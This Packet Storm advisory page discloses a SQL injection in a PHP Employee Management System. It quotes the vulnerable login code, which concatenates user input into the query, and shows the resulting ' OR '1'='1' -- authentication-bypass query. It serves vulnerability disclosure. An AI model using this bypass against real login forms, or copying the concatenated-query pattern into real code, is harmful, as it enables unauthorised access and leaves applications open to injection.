Security
Headlines
HeadlinesLatestCVEs

Headline

Employee Management System 1.0 SQL Injection

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

Packet Storm
#sql#vulnerability#web#windows#google#php#auth

Exploit Title: Employee Management System - SQL Injection

Google Dork: N/A

Application: Employee Management System

Date: 19.02.2024

Bugs: SQL Injection

Exploit Author: SoSPiro

Vendor Homepage: https://www.sourcecodester.com/

Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html

Version: N/A

Tested on: Windows 10 64 bit Wampserver

CVE : N/A

Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email=’’ OR ‘1’=’1’ --' AND password = ‘’ AND status = ‘Active’
As “1=1” is always true, the query would return positive results, allowing the attacker to log in.

Vulnerable code section:

====================================================
employee/Admin/login.php

<?php
session_start();
error_reporting(1);
include(‘…/connect.php’);

//Get website details
$sql_website = "select * from website_setting";
$result_website = $conn->query($sql_website);
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST[‘btnlogin’])){

//Get Date
date_default_timezone_set(‘Africa/Lagos’);
$current_date = date(‘Y-m-d h:i:s’);

$email = $_POST[‘txtemail’];
$password = $_POST[‘txtpassword’];
$status = 'Active’;

$sql = “SELECT * FROM users WHERE email=’” .$email. "’ and password = ‘".$password."’ and status = '".$status."’";
$result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {
// output data of each row
($row = mysqli_fetch_assoc($result));
$_SESSION[“email”] = $row[‘email’];
$_SESSION[“password”] = $row[‘password’];
$_SESSION[“phone”] = $row[‘phone’];
$firstname = $row[‘firstname’];
$_SESSION[“firstname”] = $row[‘firstname’];

 $fa = $row['2FA'];

}

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution